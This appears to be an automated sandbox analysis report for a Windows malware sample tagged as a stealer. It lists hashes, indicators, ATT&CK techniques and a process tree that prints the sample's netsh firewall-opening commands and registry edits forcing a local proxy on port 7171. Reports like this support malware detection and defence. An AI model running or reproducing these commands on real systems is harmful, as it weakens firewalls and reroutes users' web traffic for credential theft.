cb033cda58e85a4b8d6a4f58b27f75bdbd5d68ba4aa9b8736130468f1e8c0885

Analysis

max time kernel
117s
max time network
123s
platform
windows7_x64
resource
win7-20231215-en
resource tags

arch:x64arch:x86image:win7-20231215-enlocale:en-usos:windows7-x64system
submitted
29/12/2023, 20:47

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

0391980aa743c3fa10dd4aecb4cc8cc0.exe
Size

28KB
MD5

0391980aa743c3fa10dd4aecb4cc8cc0
SHA1

99fdfe068911bc4af078289865eb15936e6cae82
SHA256

cb033cda58e85a4b8d6a4f58b27f75bdbd5d68ba4aa9b8736130468f1e8c0885
SHA512

5dc213f346993d4621049a61dea96b3655edc7d0b46ee088c5d3bed7fe36675e0231bb7cb94e79d87d192bde4cbb6de19acc332e8d6f040e3dd3cf8782c93b7c
SSDEEP

384:jnjTJcXKzl4uZ2d5nzdLe2cmR51SUcEOftP56IuBKyZA8rG6dYRRTTF:71ObkmR51SUcEOKI4S8rG6+RRTTF

Score

8^/10

evasion spyware stealer

Malware Config

Signatures

Modifies Windows Firewall 1 TTPs 14 IoCs

evasion

Windows Service

T1543.003

pid	Process
1656	netsh.exe
2540	netsh.exe
2688	netsh.exe
1520	netsh.exe
1700	netsh.exe
2760	netsh.exe
2700	netsh.exe
2800	netsh.exe
528	netsh.exe
1560	netsh.exe
1216	netsh.exe
1488	netsh.exe
1484	netsh.exe
2964	netsh.exe

Executes dropped EXE 6 IoCs

pid	Process
2624	dll32.exe
3048	dll32.exe
2804	dll32.exe
2296	dll32.exe
2452	dll32.exe
2224	dll32.exe

Loads dropped DLL 10 IoCs

pid	Process
2200	cmd.exe
2200	cmd.exe
2680	cmd.exe
2680	cmd.exe
2600	cmd.exe
2600	cmd.exe
1084	cmd.exe
2052	cmd.exe
2052	cmd.exe
600	cmd.exe

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Drops file in System32 directory 14 IoCs

description	ioc	Process
File created	C:\Windows\SysWOW64\dll32.exe	cmd.exe
File opened for modification	C:\Windows\SysWOW64\dll32.exe	cmd.exe
File opened for modification	C:\Windows\SysWOW64\dll32.exe	cmd.exe
File opened for modification	C:\Windows\SysWOW64\dll32.exe	cmd.exe
File created	C:\Windows\SysWOW64\dll32.exe	cmd.exe
File created	C:\Windows\SysWOW64\dll32.exe	cmd.exe
File opened for modification	C:\Windows\SysWOW64\dll32.exe	cmd.exe
File created	C:\Windows\SysWOW64\dll32.exe	cmd.exe
File opened for modification	C:\Windows\SysWOW64\dll32.exe	cmd.exe
File created	C:\Windows\SysWOW64\dll32.exe	cmd.exe
File opened for modification	C:\Windows\SysWOW64\dll32.exe	cmd.exe
File opened for modification	C:\Windows\SysWOW64\dll32.exe	cmd.exe
File created	C:\Windows\SysWOW64\dll32.exe	cmd.exe
File created	C:\Windows\SysWOW64\dll32.exe	cmd.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 1636 wrote to memory of 2200	1636	0391980aa743c3fa10dd4aecb4cc8cc0.exe	35
PID 1636 wrote to memory of 2200	1636	0391980aa743c3fa10dd4aecb4cc8cc0.exe	35
PID 1636 wrote to memory of 2200	1636	0391980aa743c3fa10dd4aecb4cc8cc0.exe	35
PID 1636 wrote to memory of 2200	1636	0391980aa743c3fa10dd4aecb4cc8cc0.exe	35
PID 2200 wrote to memory of 2424	2200	cmd.exe	33
PID 2200 wrote to memory of 2424	2200	cmd.exe	33
PID 2200 wrote to memory of 2424	2200	cmd.exe	33
PID 2200 wrote to memory of 2424	2200	cmd.exe	33
PID 2200 wrote to memory of 2688	2200	cmd.exe	32
PID 2200 wrote to memory of 2688	2200	cmd.exe	32
PID 2200 wrote to memory of 2688	2200	cmd.exe	32
PID 2200 wrote to memory of 2688	2200	cmd.exe	32
PID 2200 wrote to memory of 2800	2200	cmd.exe	31
PID 2200 wrote to memory of 2800	2200	cmd.exe	31
PID 2200 wrote to memory of 2800	2200	cmd.exe	31
PID 2200 wrote to memory of 2800	2200	cmd.exe	31
PID 2200 wrote to memory of 2704	2200	cmd.exe	30
PID 2200 wrote to memory of 2704	2200	cmd.exe	30
PID 2200 wrote to memory of 2704	2200	cmd.exe	30
PID 2200 wrote to memory of 2704	2200	cmd.exe	30
PID 2200 wrote to memory of 2568	2200	cmd.exe	29
PID 2200 wrote to memory of 2568	2200	cmd.exe	29
PID 2200 wrote to memory of 2568	2200	cmd.exe	29
PID 2200 wrote to memory of 2568	2200	cmd.exe	29
PID 2200 wrote to memory of 2128	2200	cmd.exe	28
PID 2200 wrote to memory of 2128	2200	cmd.exe	28
PID 2200 wrote to memory of 2128	2200	cmd.exe	28
PID 2200 wrote to memory of 2128	2200	cmd.exe	28
PID 2200 wrote to memory of 2788	2200	cmd.exe	27
PID 2200 wrote to memory of 2788	2200	cmd.exe	27
PID 2200 wrote to memory of 2788	2200	cmd.exe	27
PID 2200 wrote to memory of 2788	2200	cmd.exe	27
PID 2200 wrote to memory of 2676	2200	cmd.exe	26
PID 2200 wrote to memory of 2676	2200	cmd.exe	26
PID 2200 wrote to memory of 2676	2200	cmd.exe	26
PID 2200 wrote to memory of 2676	2200	cmd.exe	26
PID 2200 wrote to memory of 2860	2200	cmd.exe	25
PID 2200 wrote to memory of 2860	2200	cmd.exe	25
PID 2200 wrote to memory of 2860	2200	cmd.exe	25
PID 2200 wrote to memory of 2860	2200	cmd.exe	25
PID 2200 wrote to memory of 2672	2200	cmd.exe	24
PID 2200 wrote to memory of 2672	2200	cmd.exe	24
PID 2200 wrote to memory of 2672	2200	cmd.exe	24
PID 2200 wrote to memory of 2672	2200	cmd.exe	24
PID 2200 wrote to memory of 2624	2200	cmd.exe	23
PID 2200 wrote to memory of 2624	2200	cmd.exe	23
PID 2200 wrote to memory of 2624	2200	cmd.exe	23
PID 2200 wrote to memory of 2624	2200	cmd.exe	23
PID 2624 wrote to memory of 2680	2624	dll32.exe	22
PID 2624 wrote to memory of 2680	2624	dll32.exe	22
PID 2624 wrote to memory of 2680	2624	dll32.exe	22
PID 2624 wrote to memory of 2680	2624	dll32.exe	22
PID 2680 wrote to memory of 576	2680	cmd.exe	20
PID 2680 wrote to memory of 576	2680	cmd.exe	20
PID 2680 wrote to memory of 576	2680	cmd.exe	20
PID 2680 wrote to memory of 576	2680	cmd.exe	20
PID 2680 wrote to memory of 1488	2680	cmd.exe	18
PID 2680 wrote to memory of 1488	2680	cmd.exe	18
PID 2680 wrote to memory of 1488	2680	cmd.exe	18
PID 2680 wrote to memory of 1488	2680	cmd.exe	18
PID 2680 wrote to memory of 2540	2680	cmd.exe	17
PID 2680 wrote to memory of 2540	2680	cmd.exe	17
PID 2680 wrote to memory of 2540	2680	cmd.exe	17
PID 2680 wrote to memory of 2540	2680	cmd.exe	17

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\Software\Microsoft\Windows\CurrentVersion\Internet Settings" /v ProxyServer /d "http=localhost:7171" /f
1⤵
PID:1088

C:\Windows\SysWOW64\reg.exe
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings" /v ProxyServer /d "http=localhost:7171" /f
1⤵
PID:2004

C:\Windows\SysWOW64\netsh.exe
netsh winhttp set proxy proxy-server="http=localhost:7171"
1⤵
PID:1872

C:\Windows\SysWOW64\netsh.exe
netsh firewall add portopening TCP 7171 dll32 ENABLE
1⤵
- Modifies Windows Firewall
PID:1656

C:\Windows\SysWOW64\netsh.exe
netsh firewall add portopening TCP 80 dll32 ENABLE
1⤵
- Modifies Windows Firewall
PID:1216

C:\Windows\SysWOW64\netsh.exe
netsh add allowedprogram "dll32" C:\Windows\System32\dll32.exe ENABLE
1⤵
PID:1068

C:\Windows\SysWOW64\cmd.exe
cmd /c c:\dll32.bat
1⤵
- Loads dropped DLL
- Drops file in System32 directory
PID:2600
- C:\Windows\SysWOW64\reg.exe
  reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings" /v ProxyOverride /d "*.local;<local>" /f
  2⤵
  PID:1984
- C:\Windows\SysWOW64\reg.exe
  reg add "HKLM\Software\Microsoft\Windows\CurrentVersion\Internet Settings" /v ProxyOverride /d "*.local;<local>" /f
  2⤵
  PID:2268
- C:\Windows\SysWOW64\reg.exe
  reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings" /v ProxyEnable /t REG_DWORD /d 01 /f
  2⤵
  PID:2784
- C:\Windows\SysWOW64\reg.exe
  reg add "HKLM\Software\Microsoft\Windows\CurrentVersion\Internet Settings" /v ProxyEnable /t REG_DWORD /d 01 /f
  2⤵
  PID:2736
- C:\Windows\SysWOW64\dll32.exe
  C:\Windows\System32\dll32.exe
  2⤵
  - Executes dropped EXE
  PID:2804
- - C:\Windows\SysWOW64\cmd.exe
    cmd /c c:\dll32.bat
    3⤵
    - Loads dropped DLL
    - Drops file in System32 directory
    PID:1084
  - - C:\Windows\SysWOW64\netsh.exe
      netsh add allowedprogram "dll32" C:\Windows\System32\dll32.exe ENABLE
      4⤵
      PID:764
  - - C:\Windows\SysWOW64\netsh.exe
      netsh firewall add portopening TCP 80 dll32 ENABLE
      4⤵
      Modifies Windows Firewall
      PID:1520
  - - C:\Windows\SysWOW64\netsh.exe
      netsh firewall add portopening TCP 7171 dll32 ENABLE
      4⤵
      Modifies Windows Firewall
      PID:528
  - - C:\Windows\SysWOW64\netsh.exe
      netsh winhttp set proxy proxy-server="http=localhost:7171"
      4⤵
      PID:2976
  - - C:\Windows\SysWOW64\reg.exe
      reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings" /v ProxyServer /d "http=localhost:7171" /f
      4⤵
      PID:2340
  - - C:\Windows\SysWOW64\reg.exe
      reg add "HKLM\Software\Microsoft\Windows\CurrentVersion\Internet Settings" /v ProxyServer /d "http=localhost:7171" /f
      4⤵
      PID:2460
  - - C:\Windows\SysWOW64\reg.exe
      reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings" /v ProxyOverride /d "*.local;<local>" /f
      4⤵
      PID:664
  - - C:\Windows\SysWOW64\reg.exe
      reg add "HKLM\Software\Microsoft\Windows\CurrentVersion\Internet Settings" /v ProxyOverride /d "*.local;<local>" /f
      4⤵
      PID:268
  - - C:\Windows\SysWOW64\reg.exe
      reg add "HKLM\Software\Microsoft\Windows\CurrentVersion\Internet Settings" /v ProxyEnable /t REG_DWORD /d 01 /f
      4⤵
      PID:1492
  - - C:\Windows\SysWOW64\reg.exe
      reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings" /v ProxyEnable /t REG_DWORD /d 01 /f
      4⤵
      PID:2496
  - - C:\Windows\SysWOW64\dll32.exe
      C:\Windows\System32\dll32.exe
      4⤵
      Executes dropped EXE
      PID:2296
    - - C:\Windows\SysWOW64\cmd.exe
        
        cmd /c c:\dll32.bat
        5⤵
        Loads dropped DLL
        Drops file in System32 directory
        
        PID:2052
      - C:\Windows\SysWOW64\netsh.exe
        
        netsh add allowedprogram "dll32" C:\Windows\System32\dll32.exe ENABLE
        6⤵
        
        PID:2428
      - C:\Windows\SysWOW64\netsh.exe
        
        netsh firewall add portopening TCP 80 dll32 ENABLE
        6⤵
        Modifies Windows Firewall
        
        PID:1484
      - C:\Windows\SysWOW64\netsh.exe
        
        netsh firewall add portopening TCP 7171 dll32 ENABLE
        6⤵
        Modifies Windows Firewall
        
        PID:1560
      - C:\Windows\SysWOW64\netsh.exe
        
        netsh winhttp set proxy proxy-server="http=localhost:7171"
        6⤵
        
        PID:392
      - C:\Windows\SysWOW64\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings" /v ProxyServer /d "http=localhost:7171" /f
        6⤵
        
        PID:1784
      - C:\Windows\SysWOW64\reg.exe
        
        reg add "HKLM\Software\Microsoft\Windows\CurrentVersion\Internet Settings" /v ProxyServer /d "http=localhost:7171" /f
        6⤵
        
        PID:1644
      - C:\Windows\SysWOW64\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings" /v ProxyOverride /d "*.local;<local>" /f
        6⤵
        
        PID:2024
      - C:\Windows\SysWOW64\reg.exe
        
        reg add "HKLM\Software\Microsoft\Windows\CurrentVersion\Internet Settings" /v ProxyOverride /d "*.local;<local>" /f
        6⤵
        
        PID:2020
      - C:\Windows\SysWOW64\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings" /v ProxyEnable /t REG_DWORD /d 01 /f
        6⤵
        
        PID:1620
      - C:\Windows\SysWOW64\reg.exe
        
        reg add "HKLM\Software\Microsoft\Windows\CurrentVersion\Internet Settings" /v ProxyEnable /t REG_DWORD /d 01 /f
        6⤵
        
        PID:1448
      - C:\Windows\SysWOW64\dll32.exe
        
        C:\Windows\System32\dll32.exe
        6⤵
        Executes dropped EXE
        
        PID:2452
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd /c c:\dll32.bat
        7⤵
        Loads dropped DLL
        Drops file in System32 directory
        
        PID:600
        
        C:\Windows\SysWOW64\netsh.exe
        
        netsh add allowedprogram "dll32" C:\Windows\System32\dll32.exe ENABLE
        8⤵
        
        PID:2056
        
        C:\Windows\SysWOW64\netsh.exe
        
        netsh firewall add portopening TCP 80 dll32 ENABLE
        8⤵
        Modifies Windows Firewall
        
        PID:1700
        
        C:\Windows\SysWOW64\netsh.exe
        
        netsh firewall add portopening TCP 7171 dll32 ENABLE
        8⤵
        Modifies Windows Firewall
        
        PID:2964
        
        C:\Windows\SysWOW64\netsh.exe
        
        netsh winhttp set proxy proxy-server="http=localhost:7171"
        8⤵
        
        PID:560
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings" /v ProxyServer /d "http=localhost:7171" /f
        8⤵
        
        PID:2212
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add "HKLM\Software\Microsoft\Windows\CurrentVersion\Internet Settings" /v ProxyServer /d "http=localhost:7171" /f
        8⤵
        
        PID:1116
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings" /v ProxyOverride /d "*.local;<local>" /f
        8⤵
        
        PID:3004
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add "HKLM\Software\Microsoft\Windows\CurrentVersion\Internet Settings" /v ProxyOverride /d "*.local;<local>" /f
        8⤵
        
        PID:2644
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings" /v ProxyEnable /t REG_DWORD /d 01 /f
        8⤵
        
        PID:2484
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add "HKLM\Software\Microsoft\Windows\CurrentVersion\Internet Settings" /v ProxyEnable /t REG_DWORD /d 01 /f
        8⤵
        
        PID:2640
        
        C:\Windows\SysWOW64\dll32.exe
        
        C:\Windows\System32\dll32.exe
        8⤵
        Executes dropped EXE
        
        PID:2224
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd /c c:\dll32.bat
        9⤵
        Drops file in System32 directory
        
        PID:2208
        
        C:\Windows\SysWOW64\netsh.exe
        
        netsh add allowedprogram "dll32" C:\Windows\System32\dll32.exe ENABLE
        10⤵
        
        PID:2520
        
        C:\Windows\SysWOW64\netsh.exe
        
        netsh firewall add portopening TCP 80 dll32 ENABLE
        10⤵
        Modifies Windows Firewall
        
        PID:2700
        
        C:\Windows\SysWOW64\netsh.exe
        
        netsh firewall add portopening TCP 7171 dll32 ENABLE
        10⤵
        Modifies Windows Firewall
        
        PID:2760
        
        C:\Windows\SysWOW64\netsh.exe
        
        netsh winhttp set proxy proxy-server="http=localhost:7171"
        10⤵
        
        PID:2852

C:\Windows\SysWOW64\dll32.exe
C:\Windows\System32\dll32.exe
1⤵
- Executes dropped EXE
PID:3048

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\Software\Microsoft\Windows\CurrentVersion\Internet Settings" /v ProxyEnable /t REG_DWORD /d 01 /f
1⤵
PID:2944

C:\Windows\SysWOW64\reg.exe
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings" /v ProxyEnable /t REG_DWORD /d 01 /f
1⤵
PID:2816

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\Software\Microsoft\Windows\CurrentVersion\Internet Settings" /v ProxyOverride /d "*.local;<local>" /f
1⤵
PID:1408

C:\Windows\SysWOW64\reg.exe
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings" /v ProxyOverride /d "*.local;<local>" /f
1⤵
PID:2900

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\Software\Microsoft\Windows\CurrentVersion\Internet Settings" /v ProxyServer /d "http=localhost:7171" /f
1⤵
PID:2908

C:\Windows\SysWOW64\reg.exe
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings" /v ProxyServer /d "http=localhost:7171" /f
1⤵
PID:2892

C:\Windows\SysWOW64\netsh.exe
netsh winhttp set proxy proxy-server="http=localhost:7171"
1⤵
PID:1308

C:\Windows\SysWOW64\netsh.exe
netsh firewall add portopening TCP 7171 dll32 ENABLE
1⤵
- Modifies Windows Firewall
PID:2540

C:\Windows\SysWOW64\netsh.exe
netsh firewall add portopening TCP 80 dll32 ENABLE
1⤵
- Modifies Windows Firewall
PID:1488

C:\Windows\SysWOW64\netsh.exe
netsh add allowedprogram "dll32" C:\Windows\System32\dll32.exe ENABLE
1⤵
PID:576

C:\Windows\SysWOW64\cmd.exe
cmd /c c:\dll32.bat
1⤵
- Loads dropped DLL
- Drops file in System32 directory
- Suspicious use of WriteProcessMemory
PID:2680

C:\Windows\SysWOW64\dll32.exe
C:\Windows\System32\dll32.exe
1⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:2624

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\Software\Microsoft\Windows\CurrentVersion\Internet Settings" /v ProxyEnable /t REG_DWORD /d 01 /f
1⤵
PID:2672

C:\Windows\SysWOW64\reg.exe
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings" /v ProxyEnable /t REG_DWORD /d 01 /f
1⤵
PID:2860

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\Software\Microsoft\Windows\CurrentVersion\Internet Settings" /v ProxyOverride /d "*.local;<local>" /f
1⤵
PID:2676

C:\Windows\SysWOW64\reg.exe
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings" /v ProxyOverride /d "*.local;<local>" /f
1⤵
PID:2788

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\Software\Microsoft\Windows\CurrentVersion\Internet Settings" /v ProxyServer /d "http=localhost:7171" /f
1⤵
PID:2128

C:\Windows\SysWOW64\reg.exe
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings" /v ProxyServer /d "http=localhost:7171" /f
1⤵
PID:2568

C:\Windows\SysWOW64\netsh.exe
netsh winhttp set proxy proxy-server="http=localhost:7171"
1⤵
PID:2704

C:\Windows\SysWOW64\netsh.exe
netsh firewall add portopening TCP 7171 dll32 ENABLE
1⤵
- Modifies Windows Firewall
PID:2800

C:\Windows\SysWOW64\netsh.exe
netsh firewall add portopening TCP 80 dll32 ENABLE
1⤵
- Modifies Windows Firewall
PID:2688

C:\Windows\SysWOW64\netsh.exe
netsh add allowedprogram "dll32" C:\Windows\System32\dll32.exe ENABLE
1⤵
PID:2424

C:\Windows\SysWOW64\cmd.exe
cmd /c c:\dll32.bat
1⤵
- Loads dropped DLL
- Drops file in System32 directory
- Suspicious use of WriteProcessMemory
PID:2200

C:\Users\Admin\AppData\Local\Temp\0391980aa743c3fa10dd4aecb4cc8cc0.exe
"C:\Users\Admin\AppData\Local\Temp\0391980aa743c3fa10dd4aecb4cc8cc0.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:1636

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Create or Modify System Process

T1543

Windows Service

T1543.003

Privilege Escalation

Create or Modify System Process

T1543

Windows Service

T1543.003

Defense Evasion

Credential Access

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\kzcnpuah.default-release\prefs.js

Filesize
6KB

MD5
e239270feec8c0c615484f27dfd1ce57

SHA1
9f4c10422b825d4e5b57eb59a1c7c8059fc0f698

SHA256
7aca6b185a3a5337452345ab41a93d52c3fac080787427b4232c8ddf2d4049c1

SHA512
4bd361886c14da47f7d85b396dc63a28c2d6c71b015ed814c2918d9901c6781bb26b61ffb214abc85e84460abd76350ad39ef47533f8401da770be927dc3b991

Download Submit
C:\Windows\SysWOW64\dll32.exe

Filesize
28KB

MD5
0391980aa743c3fa10dd4aecb4cc8cc0

SHA1
99fdfe068911bc4af078289865eb15936e6cae82

SHA256
cb033cda58e85a4b8d6a4f58b27f75bdbd5d68ba4aa9b8736130468f1e8c0885

SHA512
5dc213f346993d4621049a61dea96b3655edc7d0b46ee088c5d3bed7fe36675e0231bb7cb94e79d87d192bde4cbb6de19acc332e8d6f040e3dd3cf8782c93b7c

Download Submit
\??\c:\dll32.bat

Filesize
1KB

MD5
5fbc138c19c7cbe5bbfc1563b33d33ee

SHA1
972bfa725599b9a042c93505c604f8d14648158e

SHA256
376742be903dbbbfebc09de016d3c5a3a741ebf5088250f895da03315d8bdd7b

SHA512
17de8b53c746cfedca71eb9a5fdbf601ce1429ae36fb5d32f0f0f4718a2de3405b733a9db85e8c52a00ce19daec38ce1c6e36e6e0c771d39c2ac59e9b2417d8f

Download Submit
\??\c:\dll32.bat

Filesize
1KB

MD5
a53508ba72b2ce592a0e18a85c082f01

SHA1
a3bcdaa5ff9ab3c31e74f7f5fea699eee469db37

SHA256
6e2d168ea209bf3d08107efb4a5f60083f3f9e435bf984674f329d233f25cfd7

SHA512
592cbb603d0c63bf5227d25af467202d9c2d9c1425e597d4de88b54b5bbb2f44b27e779b6a0fa72b650f040558345321d2d3bab93bb76555959004cdb5b0732e

Download Submit

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads